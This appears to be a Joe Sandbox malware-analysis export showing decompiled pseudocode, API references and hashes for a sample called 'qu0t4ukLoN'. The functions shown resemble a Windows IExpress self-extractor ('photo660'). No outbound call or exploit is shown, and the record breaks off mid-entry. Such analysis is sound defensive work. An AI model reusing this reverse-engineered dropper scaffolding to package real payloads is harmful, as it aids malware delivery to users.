                                                                                                                                                                                                        • Instruction ID: a646123a72f2c8813302b191a3cbeefe0e6da557f742a3dc99556efa5e8f2452
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e7df0855c596bc1c9276fbc3f363a7c66aff43c422cd86c642d97c5a62cf4dc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0521B771B4020A7BDF209BE59C4AFBF76F8EB95B50F20051FFA02D6181DB758802D6A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A97155() {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct _FILETIME _v16;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                        				_t23 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                        					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                        					_t39 = _t36;
                                                                                                                                                                                                        					if(_t36 == 0xbb40e64e || ( *0xa98004 & 0xffff0000) == 0) {
                                                                                                                                                                                                        						_t36 = 0xbb40e64f;
                                                                                                                                                                                                        						_t39 = 0xbb40e64f;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xa98004 = _t39;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t37 =  !_t36;
                                                                                                                                                                                                        				 *0xa98008 = _t37;
                                                                                                                                                                                                        				return _t37;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A97182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00A97191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00A9719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00A971A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00A971B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: 86ad4832ba5cf7aa719bfd1f16ea2774eba14b4f63d3dfe5fa5624dd8438d014
                                                                                                                                                                                                        • Instruction ID: 345ffb8053f74a794aa4547418fbdcadd40a05daa9d3b83ef322a0290faf71ae
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86ad4832ba5cf7aa719bfd1f16ea2774eba14b4f63d3dfe5fa5624dd8438d014
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52113A71E11208DBCF10DFF8DA48A9EB7F4EF18314F614A57D806E7220EA349A05CB51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A96CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A96E26,00A91000), ref: 00A96CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00A96E26,?,00A96E26,00A91000), ref: 00A96D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00A96E26,00A91000), ref: 00A96D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00A96E26,00A91000), ref: 00A96D12
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3231755760-0
                                                                                                                                                                                                        • Opcode ID: c9a1db699e53e79112050d3aeb33010d7d6a4e29ba8c2a4d9c869ff50931e1a4
                                                                                                                                                                                                        • Instruction ID: a448a85249839b5dfdc511bdbfe7d04634735f13f4465ab32bc9e18ac77d6685
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9a1db699e53e79112050d3aeb33010d7d6a4e29ba8c2a4d9c869ff50931e1a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0CD0C932200108BBDB006BE1EC0CA593F28EB98212F644103F31986030CE3244528B92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E00A93210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                                        				char _t24;
                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                        				int _t27;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				CHAR* _t49;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				struct HWND__* _t64;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                                                                        				_t6 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L38:
                                                                                                                                                                                                        					EndDialog(_t64, ??);
                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 = 1;
                                                                                                                                                                                                        				_t10 = _t6 - 0x100;
                                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                                        					E00A943D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                        					SetWindowTextA(_t64, "photo660");
                                                                                                                                                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                        					__eflags =  *0xa99a40 - _t42; // 0x3
                                                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L36:
                                                                                                                                                                                                        					return _t42;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t10 == _t42) {
                                                                                                                                                                                                        					_t20 = _a12 - 1;
                                                                                                                                                                                                        					__eflags = _t20;
                                                                                                                                                                                                        					if(_t20 == 0) {
                                                                                                                                                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa991e4, 0x104);
                                                                                                                                                                                                        						__eflags = _t21;
                                                                                                                                                                                                        						if(_t21 == 0) {
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							_t58 = 0x4bf;
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							E00A944B9(_t64, _t58);
                                                                                                                                                                                                        							goto L39;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t49 = 0xa991e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t23 =  *_t49;
                                                                                                                                                                                                        							_t49 =  &(_t49[1]);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        						} while (_t23 != 0);
                                                                                                                                                                                                        						__eflags = _t49 - 0xa991e5 - 3;
                                                                                                                                                                                                        						if(_t49 - 0xa991e5 < 3) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 =  *0xa991e5; // 0x3a
                                                                                                                                                                                                        						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                        						if(_t24 == 0x3a) {
                                                                                                                                                                                                        							L21:
                                                                                                                                                                                                        							_t25 = GetFileAttributesA(0xa991e4);
                                                                                                                                                                                                        							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                        							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        								L26:
                                                                                                                                                                                                        								E00A9658A(0xa991e4, 0x104, 0xa91140);
                                                                                                                                                                                                        								_t27 = E00A958C8(0xa991e4);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 != 0) {
                                                                                                                                                                                                        									__eflags =  *0xa991e4 - 0x5c;
                                                                                                                                                                                                        									if( *0xa991e4 != 0x5c) {
                                                                                                                                                                                                        										L30:
                                                                                                                                                                                                        										_t30 = E00A9597D(0xa991e4, 1, _t64, 1);
                                                                                                                                                                                                        										__eflags = _t30;
                                                                                                                                                                                                        										if(_t30 == 0) {
                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                        											_t42 = 1;
                                                                                                                                                                                                        											__eflags = 1;
                                                                                                                                                                                                        											goto L36;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t42 = 1;
                                                                                                                                                                                                        										EndDialog(_t64, 1);
                                                                                                                                                                                                        										goto L36;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xa991e5 - 0x5c;
                                                                                                                                                                                                        									if( *0xa991e5 == 0x5c) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t58 = 0x4be;
                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t32 = E00A944B9(_t64, 0x54a, 0xa991e4, 0, 0x20, 4);
                                                                                                                                                                                                        							__eflags = _t32 - 6;
                                                                                                                                                                                                        							if(_t32 != 6) {
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t33 = CreateDirectoryA(0xa991e4, 0);
                                                                                                                                                                                                        							__eflags = _t33;
                                                                                                                                                                                                        							if(_t33 != 0) {
                                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0xa991e4);
                                                                                                                                                                                                        							_t58 = 0x4cb;
                                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags =  *0xa991e4 - 0x5c;
                                                                                                                                                                                                        						if( *0xa991e4 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                        						if(_t24 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t34 = _t20 - 1;
                                                                                                                                                                                                        					__eflags = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						EndDialog(_t64, 0);
                                                                                                                                                                                                        						 *0xa99124 = 0x800704c7;
                                                                                                                                                                                                        						goto L39;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t34 != 0x834;
                                                                                                                                                                                                        					if(_t34 != 0x834) {
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t37 = LoadStringA( *0xa99a3c, 0x3e8, 0xa98598, 0x200);
                                                                                                                                                                                                        					__eflags = _t37;
                                                                                                                                                                                                        					if(_t37 != 0) {
                                                                                                                                                                                                        						_t38 = E00A94224(_t64, _t46, _t46);
                                                                                                                                                                                                        						__eflags = _t38;
                                                                                                                                                                                                        						if(_t38 == 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa987a0);
                                                                                                                                                                                                        						__eflags = _t39;
                                                                                                                                                                                                        						if(_t39 != 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t63 = 0x4c0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						E00A944B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L38;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = 0x4b1;
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}

























                                                                                                                                                                                                        0x00a93271
                                                                                                                                                                                                        0x00a93277
                                                                                                                                                                                                        0x00a93279
                                                                                                                                                                                                        0x00a93298
                                                                                                                                                                                                        0x00a9329d
                                                                                                                                                                                                        0x00a9329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a932b0
                                                                                                                                                                                                        0x00a932b6
                                                                                                                                                                                                        0x00a932b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a932be
                                                                                                                                                                                                        0x00a93280
                                                                                                                                                                                                        0x00a93289
                                                                                                                                                                                                        0x00a9328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9328e
                                                                                                                                                                                                        0x00a9327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,00A98598,00000200), ref: 00A93271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00A933E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00A933F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A93410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 00A93426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00A9342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00A9343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$photo660
                                                                                                                                                                                                        • API String ID: 2418873061-4267169756
                                                                                                                                                                                                        • Opcode ID: d649dbc003e1c580f5e2b1c9acfcc95045090fec06596165dc6a11d624489bf7
                                                                                                                                                                                                        • Instruction ID: 2019e256d002927090024b02adf54369c2bacef0d64672ebdb75fadfa15a0e67
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d649dbc003e1c580f5e2b1c9acfcc95045090fec06596165dc6a11d624489bf7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF514D3238024077EF219B795D4DFBB29FCEB96B55F20412AF106DA1D0DEA4CE0392A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00A92CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				struct HRSRC__* _t31;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t13 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                        				_t65 = 0;
                                                                                                                                                                                                        				_t66 = __ecx;
                                                                                                                                                                                                        				_t48 = __edx;
                                                                                                                                                                                                        				 *0xa99a3c = __ecx;
                                                                                                                                                                                                        				memset(0xa99140, 0, 0x8fc);
                                                                                                                                                                                                        				memset(0xa98a20, 0, 0x32c);
                                                                                                                                                                                                        				memset(0xa988c0, 0, 0x104);
                                                                                                                                                                                                        				 *0xa993ec = 1;
                                                                                                                                                                                                        				_t20 = E00A9468F("TITLE", 0xa99154, 0x7f);
                                                                                                                                                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                        					_t64 = 0x4b1;
                                                                                                                                                                                                        					goto L32;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                        					 *0xa9858c = _t27;
                                                                                                                                                                                                        					SetEvent(_t27);
                                                                                                                                                                                                        					_t64 = 0xa99a34;
                                                                                                                                                                                                        					if(E00A9468F("EXTRACTOPT", 0xa99a34, 4) != 0) {
                                                                                                                                                                                                        						if(( *0xa99a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                        							 *0xa99120 =  *0xa99120 & _t65;
                                                                                                                                                                                                        							if(E00A95C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                        								if( *0xa98a3a == 0) {
                                                                                                                                                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                        									if(_t31 != 0) {
                                                                                                                                                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xa98184 != 0) {
                                                                                                                                                                                                        										__imp__#17();
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xa98a24 == 0) {
                                                                                                                                                                                                        										_t57 = _t65;
                                                                                                                                                                                                        										if(E00A936EE(_t65) == 0) {
                                                                                                                                                                                                        											goto L33;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t33 =  *0xa99a40; // 0x3
                                                                                                                                                                                                        											_t48 = 1;
                                                                                                                                                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                        												if(( *0xa99a34 & 0x00000100) == 0 || ( *0xa98a38 & 0x00000001) != 0 || E00A918A3(_t64, _t66) != 0) {
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t64 = 0x7d6;
                                                                                                                                                                                                        													if(E00A96517(_t57, 0x7d6, _t34, E00A919E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                        														goto L33;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												L30:
                                                                                                                                                                                                        												_t23 = _t48;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t23 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00A92390(0xa98a3a);
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t64 = 0x520;
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								E00A944B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 =  &_v268;
                                                                                                                                                                                                        							if(E00A9468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                        								 *0xa98588 = _t43;
                                                                                                                                                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(( *0xa99a34 & 0x00000080) == 0) {
                                                                                                                                                                                                        										_t64 = 0x524;
                                                                                                                                                                                                        										if(E00A944B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t64 = 0x54b;
                                                                                                                                                                                                        										E00A944B9(0, 0x54b, "photo660", 0, 0x10, 0);
                                                                                                                                                                                                        										L11:
                                                                                                                                                                                                        										CloseHandle( *0xa98588);
                                                                                                                                                                                                        										 *0xa99124 = 0x800700b7;
                                                                                                                                                                                                        										goto L33;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t64 = 0x4b1;
                                                                                                                                                                                                        						E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						 *0xa99124 = 0x80070714;
                                                                                                                                                                                                        						L33:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A96CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A92CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A92CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A92CF9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                          • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                          • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                          • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                          • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92D40
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A92DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(photo660,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92E0A
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$photo660
                                                                                                                                                                                                        • API String ID: 1002816675-3055790139
                                                                                                                                                                                                        • Opcode ID: 15bccdbc09b28ac740f14803f72cdffd6a89fdc805ac3800293a8de828666428
                                                                                                                                                                                                        • Instruction ID: d74ed699062868c344ec5ec34d6147a52c079d1e98f9863d3ea3e8ce2b981273
